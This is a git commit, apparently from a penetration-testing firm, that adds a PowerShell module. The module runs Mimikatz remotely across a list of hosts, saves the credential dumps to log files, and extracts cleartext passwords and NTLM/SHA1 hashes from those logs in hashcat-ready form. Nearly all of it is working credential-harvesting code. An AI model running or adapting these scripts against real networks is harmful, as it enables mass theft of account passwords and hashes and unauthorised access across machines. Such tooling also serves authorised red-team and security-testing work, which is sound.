Add files to repository

0x6d69636b · 0x6d69636b · commit ecb189345f9e · 2017-03-10T08:17:04.000+01:00
[+] added file Invoke-MimikatzNetwork.ps1
[+] added file PowerShellUtilities.psd1
[+] added file PowerShellUtilities.psm1
[+] added file Select-MimikatzPasswords.ps1
diff --git a/Invoke-MimikatzNetwork.ps1 b/Invoke-MimikatzNetwork.ps1
@@ -0,0 +1,59 @@
+<#
+    ScipUtilities provides various utility commandlets.
+
+    Author: Eleanore Young, Michael Schneider, scip AG
+    License: MIT
+    Copyright: 2017 Eleanore Young, Michael Schneider, scip AG
+    Required Dependencies: None
+    Optional Dependencies: None
+#>
+
+#Requires -Version 2
+Set-StrictMode -Version 2
+
+function Invoke-MimikatzNetwork {
+<#
+    .SYNOPSIS
+    Invoke Mimikatz using the PowerSploit framework over the network.
+
+    .PARAMETER HostFile
+    The path to a list of target hosts.
+#>
+    [CmdletBinding()]
+    Param (
+        [Parameter(Mandatory=$true)]
+        [ValidateScript({Test-Path $_})]
+        [String]
+        $HostFile
+    )
+
+    $BasePath = "C:\tmp"
+    $Timestamp = (Get-Date).ToString("yyyyMd")
+    $Protocol = "$basePath\protocol-$timestamp.txt"
+    $Hosts = Get-Content $HostFile
+
+    Foreach ($ComputerName in $Hosts) {
+
+        $Time = Get-Date -Format G
+        $StartMessage = "[*] $Time - Connecting to $ComputerName..."
+        $StartMessage | Tee-Object -Append -FilePath $Protocol    
+
+        $LogMimikatz = "$BasePath\cred_$ComputerName.log"
+
+        Try
+        {
+            Invoke-Mimikatz -ComputerName $ComputerName -ErrorAction Stop -ErrorVariable ErrorInvokeMimikatz | Out-File -Encoding utf8 $LogMimikatz
+        }
+        Catch
+        { 
+            $Time = Get-Date -Format G
+            $ErrorMessage = "[!] $Time - ERROR: $ComputerName - " + $ErrorInvokeMimikatz[1].FullyQualifiedErrorId
+            $ErrorMessage | Tee-Object -Append -FilePath $Protocol
+            $ErrorInvokeMimikatz = $null
+        }    
+    
+        $Time = Get-Date -Format G
+        $EndMessage = "[*] $Time - $ComputerName done"
+        $EndMessage | Tee-Object -Append -FilePath $Protocol
+    }
+}
diff --git a/PowerShellUtilities.psd1 b/PowerShellUtilities.psd1
diff --git a/PowerShellUtilities.psm1 b/PowerShellUtilities.psm1
@@ -0,0 +1,10 @@
+<#
+    PowerShellUtilities provides various utility commandlets.
+
+    Author: Eleanore Young, Michael Schneider, scip AG
+    License: MIT
+    Copyright: 2017 Eleanore Young, Michael Schneider, scip AG
+    Required Dependencies: None
+    Optional Dependencies: None
+#>
+Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}
diff --git a/Select-MimikatzPasswords.ps1 b/Select-MimikatzPasswords.ps1
@@ -0,0 +1,102 @@
+<#
+    ScipUtilities provides various utility commandlets.
+
+    Author: Eleanore Young, Michael Schneider, scip AG
+    License: MIT
+    Copyright: 2017 Eleanore Young, Michael Schneider, scip AG
+    Required Dependencies: None
+    Optional Dependencies: None
+#>
+
+#Requires -Version 2
+Set-StrictMode -Version 2
+
+function Select-MimikatzPasswords {
+<#
+    .SYNOPSIS
+    Extract passwords or password hashes from Mimikatz log files. Developed for Mimikatz version 2.0 alpha.
+
+    .PARAMETER Path
+    Choose the path or GLOB pattern that tells the function which files to search.
+
+    .PARAMETER FindData
+    Choose to look for either passwords or hashes (ntlm and sha1).
+
+    .PARAMETER OutputTo
+    Output the results either to the console, to a format parseable in hashcat, or to CSV.
+#>
+    [CmdletBinding()]
+    Param (
+        [ValidateNotNullOrEmpty()]
+        [String]
+        $Path = "*.log",
+
+        [ValidateSet("passwords", "ntlm", "sha1")]
+        [String]
+        $FindData = "passwords",
+
+        [ValidateSet("console", "hashcat", "csv")]
+        [String]
+        $OutputTo = "console"
+    )
+
+    $PasswordRegex = "\s+\*\sUsername\s+:\s(?<username>[a-zA-Z0-9]+)[\r\n]+\s+\*\sDomain\s+:\s(?<domain>[a-zA-Z0-9]+)[\r\n]+\s+\*\sPassword\s+:\s(?<password>(?!\(null\)).*)[\r\n]+"
+    $HashRegex = "\s+\*\sUsername\s+:\s(?<username>[a-zA-Z0-9]+)[\r\n]+\s+\*\sDomain\s+:\s(?<domain>[a-zA-Z0-9]+)[\r\n]+\s+\*\sFlags\s+:\s.*[\r\n]+\s+\*\sNTLM\s+:\s(?<ntlm>[0-9a-fA-F]+)[\r\n]+\s+\*\sSHA1\s+:\s(?<sha1>[0-9a-fA-F]+)[\r\n]+"
+
+    $PasswordOutput = New-Object System.Collections.Generic.List[System.Object]
+    $HashOutput = New-Object System.Collections.Generic.List[System.Object]
+    Foreach ($LogFile in Get-ChildItem -Recurse $Path) {
+        $Content = Get-Content -Raw -Path $LogFile
+        $PasswordMatches = Select-String -InputObject $Content -AllMatches -Pattern $PasswordRegex
+
+        Foreach ($Match in $PasswordMatches.Matches) {
+            $SearchEntry = New-Object System.Object
+            $SearchEntry | Add-Member -NotePropertyName "Username" -NotePropertyValue $Match.Groups["username"].Value
+            $SearchEntry | Add-Member -NotePropertyName "Domain" -NotePropertyValue $Match.Groups["domain"].Value
+            $SearchEntry | Add-Member -NotePropertyName "Password" -NotePropertyValue $Match.Groups["password"].Value
+            $PasswordOutput.Add($SearchEntry)
+        }
+
+        $HashMatches = Select-String -InputObject $Content -AllMatches -Pattern $HashRegex
+        Foreach ($Match in $HashMatches.Matches) {
+            $SearchEntry = New-Object System.Object
+            $SearchEntry | Add-Member -NotePropertyName "Username" -NotePropertyValue $Match.Groups["username"].Value
+            $SearchEntry | Add-Member -NotePropertyName "Domain" -NotePropertyValue $Match.Groups["domain"].Value
+            $SearchEntry | Add-Member -NotePropertyName "NTLM" -NotePropertyValue $Match.Groups["ntlm"].Value
+            $SearchEntry | Add-Member -NotePropertyName "SHA1" -NotePropertyValue $Match.Groups["sha1"].Value
+            $HashOutput.Add($SearchEntry)
+        }
+    }
+
+    $PasswordOutput = ($PasswordOutput | Sort-Object -Property Username -Unique)
+    $HashOutput = ($HashOutput | Sort-Object -Property Username -Unique)
+
+    if ($OutputTo -eq "csv") {
+        
+        if ($FindData -in ("ntlm", "sha1")) {
+            $HashOutput | ConvertTo-Csv -NoTypeInformation
+        } elseif ($FindData -eq "passwords") {
+            $PasswordOutput | ConvertTo-Csv -NoTypeInformation
+        } else {
+            throw "Format '$FindData' doesn't make sense for CSV output."
+        }
+    } elseif ($OutputTo -eq "hashcat") {
+        if ($FindData -eq "ntlm") {
+            Foreach ($Entry in $HashOutput) {
+                $Entry.Username + ":" + $Entry.NTLM
+            }
+        } elseif ($FindData -eq "sha1") {
+            Foreach ($Entry in $HashOutput) {
+                $Entry.Username + ":" + $Entry.SHA1
+            }
+        } else {
+            throw "Format '$FindData' doesn't make sense for hashcat output."
+        }
+    } else {
+        if ($FindData -eq "passwords") {
+            $PasswordOutput
+        } else {
+            $HashOutput
+        }
+    }
+}
